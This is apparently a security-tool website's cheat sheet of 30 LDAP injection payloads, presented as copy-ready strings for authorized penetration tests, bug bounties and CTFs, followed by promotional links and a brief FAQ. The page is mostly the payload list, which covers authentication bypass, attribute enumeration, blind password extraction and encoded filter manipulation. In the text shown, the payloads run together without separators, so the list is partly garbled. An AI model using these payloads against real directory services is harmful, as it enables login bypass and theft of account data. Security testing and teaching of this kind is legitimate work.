Real, public LDAP injection techniques for authorized pentests, bug bounties, and CTFs — auth bypass, enumeration, blind extraction, filter manipulation, and encoding. (30 payloads)
*)(uid=*))(|(uid=**)(|(uid=*))admin)(&)admin)(!(&(1=0)*)(userPassword=*)**)(|(objectClass=*x)(&(objectClass=*)(objectClass=*(&))(cn=*))(|(cn=**))%00*()|%26'*a**admin**)(mail=*)*)(userPassword=*)*)(|(objectClass=user)(objectClass=person))*)(uid=admin)(userPassword=a**)(uid=admin)(userPassword=ab*admin)(description=S*)admin)(cn>=m)admin)(cn<=m)admin)(badPwdCount=0)\28 \29 \2a \5c \00%2a%28%7c%28uid%3d%2a%29%29\2a)(uid=\2a))(\7c(uid=\2a#dn*)(objectClass=*))(&(objectClass=voidLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 30 LDAP payloads for testing LDAP Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or open the LDAP Injection generator to build customized LDAP variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all LDAP payloads are completely free, with no account required. Everything runs in your browser.